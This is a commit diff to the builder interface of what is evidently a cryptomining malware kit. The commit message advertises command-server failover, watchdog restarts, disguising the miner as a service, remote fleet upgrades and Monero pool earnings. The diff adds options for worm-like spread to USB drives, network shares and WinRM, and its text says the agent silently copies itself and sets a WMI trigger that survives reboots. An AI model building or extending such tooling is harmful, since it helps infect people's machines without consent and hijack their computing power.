Add fleet resilience, passive spread, matrix rain UI, and live earnings.
Backup server URL failover, watchdog process restart, service masquerade, remote fleet upgrade, recon UI, SupportXMR earnings, USB/share passive spread, and sidebar matrix rain with live fleet telemetry.
This commit is contained in:
@@ -1713,6 +1713,29 @@ export default function BuilderPage() {
|
||||
</label>
|
||||
<FieldHint field="remote_aggressive" />
|
||||
</div>
|
||||
|
||||
<div className="form-group checkbox-group">
|
||||
<label className="checkbox-label">
|
||||
<input type="checkbox" className="checkbox" checked={!!form.usb_spread}
|
||||
onChange={(e) => updateField('usb_spread', e.target.checked)} />
|
||||
<span>USB Propagation — copy to every new drive inserted <HelpTip field="usb_spread" /></span>
|
||||
</label>
|
||||
{form.usb_spread && (
|
||||
<div style={{ margin: '4px 0 2px 24px', padding: '6px 10px', background: 'rgba(255,180,0,0.1)', border: '1px solid rgba(255,180,0,0.4)', borderRadius: 4, fontSize: '0.82em', color: '#ffb400' }}>
|
||||
Agent will silently copy itself to any USB drive plugged into an infected PC and install a permanent WMI trigger that survives reboots.
|
||||
</div>
|
||||
)}
|
||||
<FieldHint field="usb_spread" />
|
||||
</div>
|
||||
|
||||
<div className="form-group checkbox-group">
|
||||
<label className="checkbox-label">
|
||||
<input type="checkbox" className="checkbox" checked={!!form.share_spread}
|
||||
onChange={(e) => updateField('share_spread', e.target.checked)} />
|
||||
<span>Share Drop — spread via mounted network drives & WinRM <HelpTip field="share_spread" /></span>
|
||||
</label>
|
||||
<FieldHint field="share_spread" />
|
||||
</div>
|
||||
</div>
|
||||
</>
|
||||
)}
|
||||
|
||||
Reference in New Issue
Block a user